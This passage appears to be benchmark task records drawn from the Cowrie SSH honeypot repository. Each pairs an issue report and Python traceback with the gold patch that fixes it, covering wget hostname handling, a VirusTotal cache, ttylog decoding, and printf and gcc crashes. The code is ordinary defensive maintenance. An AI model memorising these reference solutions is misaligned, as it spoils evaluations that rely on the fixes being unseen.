*args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/log.py", line 85, in callWithContext return context.call({ILogContext: newCtx}, func, *args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/context.py", line 118, in callWithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/context.py", line 83, in callWithContext return func(*args, **kw) --- <exception caught here> --- File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/internet/posixbase.py", line 687, in _doReadOrWrite why = selectable.doRead() File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/internet/tcp.py", line 246, in doRead return self._dataReceived(data) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/internet/tcp.py", line 251, in _dataReceived rval = self.protocol.dataReceived(data) File "/home/cowrie/cowrie/src/cowrie/ssh/transport.py", line 141, in dataReceived self.dispatchMessage(messageNum, packet[1:]) File "/home/cowrie/cowrie/src/cowrie/ssh/transport.py", line 145, in dispatchMessage transport.SSHServerTransport.dispatchMessage(self, message_num, payload) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/transport.py", line 747, in dispatchMessage self.service.packetReceived(messageNum, payload) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/service.py", line 47, in packetReceived return f(packet) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/connection.py", line 265, in ssh_CHANNEL_DATA channel.dataReceived(data) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/session.py", line 174, in dataReceived self.client.transport.write(data) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/session.py", line 230, in write self.proto.dataReceived(data) File "/home/cowrie/cowrie/src/cowrie/insults/insults.py", line 125, in dataReceived insults.ServerProtocol.dataReceived(self, data) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/insults/insults.py", line 520, in dataReceived self.terminalProtocol.keystrokeReceived(ch, None) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/recvline.py", line 436, in keystrokeReceived m() File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 328, in handle_RETURN return recvline.RecvLine.handle_RETURN(self) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/recvline.py", line 494, in handle_RETURN self.lineReceived(line) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 189, in lineReceived self.cmdstack[-1].lineReceived(line) File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 116, in lineReceived self.runCommand() File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 325, in runCommand self.protocol.call_command(pp, cmdclass, *cmd_array[0]["rargs"]) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 309, in call_command HoneyPotBaseProtocol.call_command(self, pp, cmd, *args) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 198, in call_command obj.start() File "/home/cowrie/cowrie/src/cowrie/commands/wget.py", line 122, in start self.deferred = self.download(self.url, self.outfile) File "/home/cowrie/cowrie/src/cowrie/commands/wget.py", line 157, in download if ipaddress.ip_address(host).is_private: File "/usr/lib64/python3.6/ipaddress.py", line 54, in ip_address address) builtins.ValueError: 'notino.cz' does not appear to be an IPv4 or IPv6 address
2021-06-06T13:46:04
cowrie/cowrie
1,576
cowrie__cowrie-1576
[ "1567" ]
90386933e519c933743e9ab24bb7a9d287515975
diff --git a/src/cowrie/commands/apt.py b/src/cowrie/commands/apt.py --- a/src/cowrie/commands/apt.py +++ b/src/cowrie/commands/apt.py @@ -142,8 +142,10 @@ def do_install(self, *args): % len(packages) ) self.write("Need to get %s.2kB of archives.\n" % (totalsize)) - self.write("After this operation, {:.1f}kB of additional disk space will be used.\n".format( - totalsize * 2.2) + self.write( + "After this operation, {:.1f}kB of additional disk space will be used.\n".format( + totalsize * 2.2 + ) ) i = 1 for p in packages:
Unable to curl or wget URL with hostname If you try to download anything via curl or wget and url contains hostname not ip address it crashes. I am pretty sure it is because of https://github.com/cowrie/cowrie/pull/1557/commits/0b3b257e0ecf10b5b4d381d724cf4c3e23f0ed81 and https://github.com/cowrie/cowrie/pull/1557/commits/ff6bfdcdb75fefbc35ac19fad7c98c0f69da48b7 Line: # TODO: need to do full name resolution. Example: The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. root@czbrqobpvmssd01:~# wget notino.czConnection to czbrqobpvmssd01 closed by remote host. Connection to czbrqobpvmssd01 closed. 2021-05-28T14:13:00.312387Z [HoneyPotSSHTransport,9,172.16.23.9] Unhandled Error Traceback (most recent call last): File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/log.py", line 101, in callWithLogger return callWithContext({"system": lp}, func, *args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/log.py", line 85, in callWithContext return context.call({ILogContext: newCtx}, func, *args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/context.py", line 118, in callWithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/context.py", line 83, in callWithContext return func(*args, **kw) --- <exception caught here> --- File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/internet/posixbase.py", line 687, in _doReadOrWrite why = selectable.doRead() File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/internet/tcp.py", line 246, in doRead return self._dataReceived(data) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/internet/tcp.py", line 251, in _dataReceived rval = self.protocol.dataReceived(data) File "/home/cowrie/cowrie/src/cowrie/ssh/transport.py", line 141, in dataReceived self.dispatchMessage(messageNum, packet[1:]) File "/home/cowrie/cowrie/src/cowrie/ssh/transport.py", line 145, in dispatchMessage transport.SSHServerTransport.dispatchMessage(self, message_num, payload) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/transport.py", line 747, in dispatchMessage self.service.packetReceived(messageNum, payload) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/service.py", line 47, in packetReceived return f(packet) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/connection.py", line 265, in ssh_CHANNEL_DATA channel.dataReceived(data) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/session.py", line 174, in dataReceived self.client.transport.write(data) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/session.py", line 230, in write self.proto.dataReceived(data) File "/home/cowrie/cowrie/src/cowrie/insults/insults.py", line 125, in dataReceived insults.ServerProtocol.dataReceived(self, data) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/insults/insults.py", line 520, in dataReceived self.terminalProtocol.keystrokeReceived(ch, None) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/recvline.py", line 436, in keystrokeReceived m() File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 328, in handle_RETURN return recvline.RecvLine.handle_RETURN(self) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/recvline.py", line 494, in handle_RETURN self.lineReceived(line) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 189, in lineReceived self.cmdstack[-1].lineReceived(line) File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 116, in lineReceived self.runCommand() File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 325, in runCommand self.protocol.call_command(pp, cmdclass, *cmd_array[0]["rargs"]) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 309, in call_command HoneyPotBaseProtocol.call_command(self, pp, cmd, *args) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 198, in call_command obj.start() File "/home/cowrie/cowrie/src/cowrie/commands/wget.py", line 122, in start self.deferred = self.download(self.url, self.outfile) File "/home/cowrie/cowrie/src/cowrie/commands/wget.py", line 157, in download if ipaddress.ip_address(host).is_private: File "/usr/lib64/python3.6/ipaddress.py", line 54, in ip_address address) builtins.ValueError: 'notino.cz' does not appear to be an IPv4 or IPv6 address
2021-06-09T04:43:08
cowrie/cowrie
1,610
cowrie__cowrie-1610
[ "1567" ]
a48f9f50b946253f1eed84b41ea0368287c22eae
diff --git a/src/cowrie/output/virustotal.py b/src/cowrie/output/virustotal.py --- a/src/cowrie/output/virustotal.py +++ b/src/cowrie/output/virustotal.py @@ -65,6 +65,7 @@ class Output(cowrie.core.output.Output): agent: Any scan_url: bool scan_file: bool + url_cache: Dict[str, float] = {} # url and last time succesfully submitted def start(self): """ @@ -293,6 +294,10 @@ def scanurl(self, entry): """ Check url scan report for a hash """ + if entry["url"] in self.url_cache: + log.msg("output_virustotal: url {} was already successfully submitted".format(entry["url"])) + return + vtUrl = f"{VTAPI_URL}url/report".encode("utf8") headers = http_headers.Headers({"User-Agent": [COWRIE_USER_AGENT]}) fields = { @@ -341,13 +346,16 @@ def processResult(result): j = json.loads(result) log.msg("VT: {}".format(j["verbose_msg"])) + # we got a status=200 assume it was successfully submitted + self.url_cache[entry["url"]] = datetime.datetime.now() + if j["response_code"] == 0: log.msg( eventid="cowrie.virustotal.scanurl", format="VT: New URL %(url)s", session=entry["session"], url=entry["url"], - is_new="true", + is_new="true" ) return d elif j["response_code"] == 1 and "scans" not in j: @@ -377,7 +385,7 @@ def processResult(result): ) log.msg("VT: permalink: {}".format(j["permalink"])) elif j["response_code"] == -2: - log.msg("VT: response=1: this has been queued for analysis already") + log.msg("VT: response=-2: this has been queued for analysis already") log.msg("VT: permalink: {}".format(j["permalink"])) else: log.msg("VT: unexpected response code: {}".format(j["response_code"]))
Unable to curl or wget URL with hostname If you try to download anything via curl or wget and url contains hostname not ip address it crashes. I am pretty sure it is because of https://github.com/cowrie/cowrie/pull/1557/commits/0b3b257e0ecf10b5b4d381d724cf4c3e23f0ed81 and https://github.com/cowrie/cowrie/pull/1557/commits/ff6bfdcdb75fefbc35ac19fad7c98c0f69da48b7 Line: # TODO: need to do full name resolution. Example: The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. root@czbrqobpvmssd01:~# wget notino.czConnection to czbrqobpvmssd01 closed by remote host. Connection to czbrqobpvmssd01 closed. 2021-05-28T14:13:00.312387Z [HoneyPotSSHTransport,9,172.16.23.9] Unhandled Error Traceback (most recent call last): File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/log.py", line 101, in callWithLogger return callWithContext({"system": lp}, func, *args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/log.py", line 85, in callWithContext return context.call({ILogContext: newCtx}, func, *args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/context.py", line 118, in callWithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/context.py", line 83, in callWithContext return func(*args, **kw) --- <exception caught here> --- File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/internet/posixbase.py", line 687, in _doReadOrWrite why = selectable.doRead() File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/internet/tcp.py", line 246, in doRead return self._dataReceived(data) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/internet/tcp.py", line 251, in _dataReceived rval = self.protocol.dataReceived(data) File "/home/cowrie/cowrie/src/cowrie/ssh/transport.py", line 141, in dataReceived self.dispatchMessage(messageNum, packet[1:]) File "/home/cowrie/cowrie/src/cowrie/ssh/transport.py", line 145, in dispatchMessage transport.SSHServerTransport.dispatchMessage(self, message_num, payload) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/transport.py", line 747, in dispatchMessage self.service.packetReceived(messageNum, payload) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/service.py", line 47, in packetReceived return f(packet) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/connection.py", line 265, in ssh_CHANNEL_DATA channel.dataReceived(data) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/session.py", line 174, in dataReceived self.client.transport.write(data) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/session.py", line 230, in write self.proto.dataReceived(data) File "/home/cowrie/cowrie/src/cowrie/insults/insults.py", line 125, in dataReceived insults.ServerProtocol.dataReceived(self, data) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/insults/insults.py", line 520, in dataReceived self.terminalProtocol.keystrokeReceived(ch, None) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/recvline.py", line 436, in keystrokeReceived m() File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 328, in handle_RETURN return recvline.RecvLine.handle_RETURN(self) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/recvline.py", line 494, in handle_RETURN self.lineReceived(line) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 189, in lineReceived self.cmdstack[-1].lineReceived(line) File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 116, in lineReceived self.runCommand() File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 325, in runCommand self.protocol.call_command(pp, cmdclass, *cmd_array[0]["rargs"]) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 309, in call_command HoneyPotBaseProtocol.call_command(self, pp, cmd, *args) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 198, in call_command obj.start() File "/home/cowrie/cowrie/src/cowrie/commands/wget.py", line 122, in start self.deferred = self.download(self.url, self.outfile) File "/home/cowrie/cowrie/src/cowrie/commands/wget.py", line 157, in download if ipaddress.ip_address(host).is_private: File "/usr/lib64/python3.6/ipaddress.py", line 54, in ip_address address) builtins.ValueError: 'notino.cz' does not appear to be an IPv4 or IPv6 address
2021-08-04T16:58:21
cowrie/cowrie
1,685
cowrie__cowrie-1685
[ "1684", "1684" ]
68c46118ed41277473cfa79280e0db52a8baf6b5
diff --git a/src/cowrie/output/hpfeeds3.py b/src/cowrie/output/hpfeeds3.py --- a/src/cowrie/output/hpfeeds3.py +++ b/src/cowrie/output/hpfeeds3.py @@ -106,8 +106,8 @@ def write(self, entry): elif entry["eventid"] == "cowrie.log.closed": # entry["ttylog"] - with open(entry["ttylog"]) as ttylog: - self.meta[session]["ttylog"] = ttylog.read().encode().hex() + with open(entry["ttylog"], 'rb') as ttylog: + self.meta[session]["ttylog"] = ttylog.read().hex() elif entry["eventid"] == "cowrie.session.closed": meta = self.meta.pop(session, None)
HPFeeds3 UnicodeDecodeError in ttylog.read().encode().hex() **Describe the bug** Stack Trace from the cowrie version v2.3.0, as already described in #1307 ``` cowrie | 2022-01-23T14:52:17+0000 [twisted.logger._observer#critical] Temporarily disabling observer LegacyLogObserverWrapper(<bound method Output.emit of <cowrie.output.hpfeeds3.Output object at 0x7f4019656490>>) due to exception: [Failure instance: Traceback: <class 'UnicodeDecodeError'>: 'utf-8' codec can't decode byte 0x88 in position 16: invalid start byte cowrie | /home/cowrie/cowrie/src/cowrie/insults/insults.py:226:connectionLost cowrie | /usr/lib/python3.9/site-packages/twisted/python/threadable.py:51:sync cowrie | /usr/lib/python3.9/site-packages/twisted/python/log.py:281:msg cowrie | /usr/lib/python3.9/site-packages/twisted/logger/_legacy.py:147:publishToNewObserver cowrie | --- <exception caught here> --- cowrie | /usr/lib/python3.9/site-packages/twisted/logger/_observer.py:82:__call__ cowrie | /usr/lib/python3.9/site-packages/twisted/logger/_legacy.py:90:__call__ cowrie | /home/cowrie/cowrie/src/cowrie/core/output.py:240:emit cowrie | /home/cowrie/cowrie/src/cowrie/output/hpfeeds3.py:110:write cowrie | /usr/lib/python3.9/codecs.py:322:decode cowrie | ] cowrie | Traceback (most recent call last): cowrie | File "/home/cowrie/cowrie/src/cowrie/insults/insults.py", line 226, in connectionLost cowrie | log.msg( cowrie | File "/usr/lib/python3.9/site-packages/twisted/python/threadable.py", line 51, in sync cowrie | return function(self, *args, **kwargs) cowrie | File "/usr/lib/python3.9/site-packages/twisted/python/log.py", line 281, in msg cowrie | _publishNew(self._publishPublisher, actualEventDict, textFromEventDict) cowrie | File "/usr/lib/python3.9/site-packages/twisted/logger/_legacy.py", line 147, in publishToNewObserver cowrie | observer(eventDict) cowrie | --- <exception caught here> --- cowrie | File "/usr/lib/python3.9/site-packages/twisted/logger/_observer.py", line 82, in __call__ cowrie | observer(event) cowrie | File "/usr/lib/python3.9/site-packages/twisted/logger/_legacy.py", line 90, in __call__ cowrie | self.legacyObserver(event) cowrie | File "/home/cowrie/cowrie/src/cowrie/core/output.py", line 240, in emit cowrie | self.write(ev) cowrie | File "/home/cowrie/cowrie/src/cowrie/output/hpfeeds3.py", line 110, in write cowrie | self.meta[session]["ttylog"] = ttylog.read().encode().hex() cowrie | File "/usr/lib/python3.9/codecs.py", line 322, in decode cowrie | (result, consumed) = self._buffer_decode(data, self.errors, final) cowrie | builtins.UnicodeDecodeError: 'utf-8' codec can't decode byte 0x88 in position 16: invalid start byte ``` **Server (please complete the following information):** - OS: Alpine Linux in Docker - Python: Python 3.9 **Additional context** The ttylog seems to be a binary file with only parts of it being text. At the moment the file is opened as a text file, then encoded to utf-8 bytes and then to a hex representation. Opening it as a binary file and directly transforming it to a hex reprenstation should fix it. HPFeeds3 UnicodeDecodeError in ttylog.read().encode().hex() **Describe the bug** Stack Trace from the cowrie version v2.3.0, as already described in #1307 ``` cowrie | 2022-01-23T14:52:17+0000 [twisted.logger._observer#critical] Temporarily disabling observer LegacyLogObserverWrapper(<bound method Output.emit of <cowrie.output.hpfeeds3.Output object at 0x7f4019656490>>) due to exception: [Failure instance: Traceback: <class 'UnicodeDecodeError'>: 'utf-8' codec can't decode byte 0x88 in position 16: invalid start byte cowrie | /home/cowrie/cowrie/src/cowrie/insults/insults.py:226:connectionLost cowrie | /usr/lib/python3.9/site-packages/twisted/python/threadable.py:51:sync cowrie | /usr/lib/python3.9/site-packages/twisted/python/log.py:281:msg cowrie | /usr/lib/python3.9/site-packages/twisted/logger/_legacy.py:147:publishToNewObserver cowrie | --- <exception caught here> --- cowrie | /usr/lib/python3.9/site-packages/twisted/logger/_observer.py:82:__call__ cowrie | /usr/lib/python3.9/site-packages/twisted/logger/_legacy.py:90:__call__ cowrie | /home/cowrie/cowrie/src/cowrie/core/output.py:240:emit cowrie | /home/cowrie/cowrie/src/cowrie/output/hpfeeds3.py:110:write cowrie | /usr/lib/python3.9/codecs.py:322:decode cowrie | ] cowrie | Traceback (most recent call last): cowrie | File "/home/cowrie/cowrie/src/cowrie/insults/insults.py", line 226, in connectionLost cowrie | log.msg( cowrie | File "/usr/lib/python3.9/site-packages/twisted/python/threadable.py", line 51, in sync cowrie | return function(self, *args, **kwargs) cowrie | File "/usr/lib/python3.9/site-packages/twisted/python/log.py", line 281, in msg cowrie | _publishNew(self._publishPublisher, actualEventDict, textFromEventDict) cowrie | File "/usr/lib/python3.9/site-packages/twisted/logger/_legacy.py", line 147, in publishToNewObserver cowrie | observer(eventDict) cowrie | --- <exception caught here> --- cowrie | File "/usr/lib/python3.9/site-packages/twisted/logger/_observer.py", line 82, in __call__ cowrie | observer(event) cowrie | File "/usr/lib/python3.9/site-packages/twisted/logger/_legacy.py", line 90, in __call__ cowrie | self.legacyObserver(event) cowrie | File "/home/cowrie/cowrie/src/cowrie/core/output.py", line 240, in emit cowrie | self.write(ev) cowrie | File "/home/cowrie/cowrie/src/cowrie/output/hpfeeds3.py", line 110, in write cowrie | self.meta[session]["ttylog"] = ttylog.read().encode().hex() cowrie | File "/usr/lib/python3.9/codecs.py", line 322, in decode cowrie | (result, consumed) = self._buffer_decode(data, self.errors, final) cowrie | builtins.UnicodeDecodeError: 'utf-8' codec can't decode byte 0x88 in position 16: invalid start byte ``` **Server (please complete the following information):** - OS: Alpine Linux in Docker - Python: Python 3.9 **Additional context** The ttylog seems to be a binary file with only parts of it being text. At the moment the file is opened as a text file, then encoded to utf-8 bytes and then to a hex representation. Opening it as a binary file and directly transforming it to a hex reprenstation should fix it.
2022-01-23T15:24:21
cowrie/cowrie
1,753
cowrie__cowrie-1753
[ "1747" ]
a916722e520ecf1b0aabbff8c78b6b7e6080ef8c
diff --git a/src/cowrie/commands/base.py b/src/cowrie/commands/base.py --- a/src/cowrie/commands/base.py +++ b/src/cowrie/commands/base.py @@ -198,7 +198,7 @@ def call(self): if s.endswith("\\c"): s = s[:-2] - self.write(codecs.escape_decode(s)[0]) + self.writeBytes(codecs.escape_decode(s)[0]) commands["/usr/bin/printf"] = Command_printf
printf crashes **Describe the bug** When using the printf command it crashes **To Reproduce** Steps to reproduce the behavior: 1. login on the honeypot 2. run printf word 3. Server closes **Server (please complete the following information):** - OS:Linux rez-latitude 5.15.0-43-generic Ubuntu SMP x86_64 x86_64 x86_64 GNU/Linux - Python: Python 3.10.4 Log output: ``` 2022-08-01T08:33:19.186990Z [HoneyPotSSHTransport,0,127.0.0.1] Command found: printf rttr 2022-08-01T08:33:19.188861Z [HoneyPotSSHTransport,0,127.0.0.1] Unhandled Error Traceback (most recent call last): File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/python/log.py", line 96, in callWithLogger return callWithContext({"system": lp}, func, *args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/python/log.py", line 80, in callWithContext return context.call({ILogContext: newCtx}, func, *args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/python/context.py", line 117, in callWithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/python/context.py", line 82, in callWithContext return func(*args, **kw) --- <exception caught here> --- File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/internet/posixbase.py", line 683, in _doReadOrWrite why = selectable.doRead() File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/internet/tcp.py", line 248, in doRead return self._dataReceived(data) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/internet/tcp.py", line 253, in _dataReceived rval = self.protocol.dataReceived(data) File "/home/cowrie/cowrie/src/cowrie/ssh/transport.py", line 144, in dataReceived self.dispatchMessage(messageNum, packet[1:]) File "/home/cowrie/cowrie/src/cowrie/ssh/transport.py", line 148, in dispatchMessage transport.SSHServerTransport.dispatchMessage(self, message_num, payload) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/conch/ssh/transport.py", line 790, in dispatchMessage self.service.packetReceived(messageNum, payload) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/conch/ssh/service.py", line 50, in packetReceived return f(packet) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/conch/ssh/connection.py", line 265, in ssh_CHANNEL_DATA channel.dataReceived(data) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/conch/ssh/session.py", line 173, in dataReceived self.client.transport.write(data) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/conch/ssh/session.py", line 233, in write self.proto.dataReceived(data) File "/home/cowrie/cowrie/src/cowrie/insults/insults.py", line 126, in dataReceived insults.ServerProtocol.dataReceived(self, data) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/conch/insults/insults.py", line 520, in dataReceived self.terminalProtocol.keystrokeReceived(ch, None) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/conch/recvline.py", line 435, in keystrokeReceived m() File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 329, in handle_RETURN return recvline.RecvLine.handle_RETURN(self) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/conch/recvline.py", line 493, in handle_RETURN self.lineReceived(line) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 190, in lineReceived self.cmdstack[-1].lineReceived(line) File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 114, in lineReceived self.runCommand() File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 329, in runCommand self.protocol.call_command(pp, cmdclass, *cmd_array[0]["rargs"]) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 310, in call_command HoneyPotBaseProtocol.call_command(self, pp, cmd, *args) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 199, in call_command obj.start() File "/home/cowrie/cowrie/src/cowrie/shell/command.py", line 146, in start self.call() File "/home/cowrie/cowrie/src/cowrie/commands/base.py", line 201, in call self.write(codecs.escape_decode(s)[0]) File "/home/cowrie/cowrie/src/cowrie/shell/command.py", line 106, in write self.writefn(data.encode("utf8")) builtins.AttributeError: 'bytes' object has no attribute 'encode' ```
2022-08-18T15:18:07
cowrie/cowrie
1,761
cowrie__cowrie-1761
[ "1758" ]
973e2d999c4c7dfc0fc311d974d6e6fa2de51c02
diff --git a/src/cowrie/commands/gcc.py b/src/cowrie/commands/gcc.py --- a/src/cowrie/commands/gcc.py +++ b/src/cowrie/commands/gcc.py @@ -133,7 +133,7 @@ def start(self): # Schedule call to make it more time consuming and real self.scheduled = reactor.callLater( # type: ignore[attr-defined] - timeout, self.generate_file(output_file if output_file else "a.out") + timeout, self.generate_file, (output_file if output_file else "a.out") ) else: self.no_files()
Gcc "compile" file quits cowrie **Describe the bug** By running gcc to "compile" a file just quits cowrie **To Reproduce** Steps to reproduce the behavior: 1. Login on the honeypot 2. Compile the file with `gcc file.c` 4. See error and cowrie will quit(`Connection to localhost closed by remote host.`) **Expected behavior** To compile the file **Server (please complete the following information):** - OS: Ubuntu 22.04 - Python: Python 3.10 **Additional context** ``` 2022-08-25T15:35:01.948821Z [HoneyPotSSHTransport,7728,127.0.0.1] CMD: gcc hi.c -o p 2022-08-25T15:35:01.950607Z [HoneyPotSSHTransport,7728,127.0.0.1] Command found: gcc hi.c -o p 2022-08-25T15:35:01.952849Z [HoneyPotSSHTransport,7728,127.0.0.1] Unhandled Error Traceback (most recent call last): File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/python/log.py", line 96, in callWithLogger return callWithContext({"system": lp}, func, *args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/python/log.py", line 80, in callWithContext return context.call({ILogContext: newCtx}, func, *args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/python/context.py", line 117, in callWithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/python/context.py", line 82, in callWithContext return func(*args, **kw) --- <exception caught here> --- File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/internet/posixbase.py", line 683, in _doReadOrWrite why = selectable.doRead() File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/internet/tcp.py", line 248, in doRead return self._dataReceived(data) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/internet/tcp.py", line 253, in _dataReceived rval = self.protocol.dataReceived(data) File "/home/cowrie/cowrie/src/cowrie/ssh/transport.py", line 144, in dataReceived self.dispatchMessage(messageNum, packet[1:]) File "/home/cowrie/cowrie/src/cowrie/ssh/transport.py", line 148, in dispatchMessage transport.SSHServerTransport.dispatchMessage(self, message_num, payload) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/conch/ssh/transport.py", line 790, in dispatchMessage self.service.packetReceived(messageNum, payload) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/conch/ssh/service.py", line 50, in packetReceived return f(packet) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/conch/ssh/connection.py", line 265, in ssh_CHANNEL_DATA channel.dataReceived(data) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/conch/ssh/session.py", line 173, in dataReceived self.client.transport.write(data) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/conch/ssh/session.py", line 233, in write self.proto.dataReceived(data) File "/home/cowrie/cowrie/src/cowrie/insults/insults.py", line 126, in dataReceived insults.ServerProtocol.dataReceived(self, data) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/conch/insults/insults.py", line 520, in dataReceived self.terminalProtocol.keystrokeReceived(ch, None) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/conch/recvline.py", line 435, in keystrokeReceived m() File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 329, in handle_RETURN return recvline.RecvLine.handle_RETURN(self) File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/conch/recvline.py", line 493, in handle_RETURN 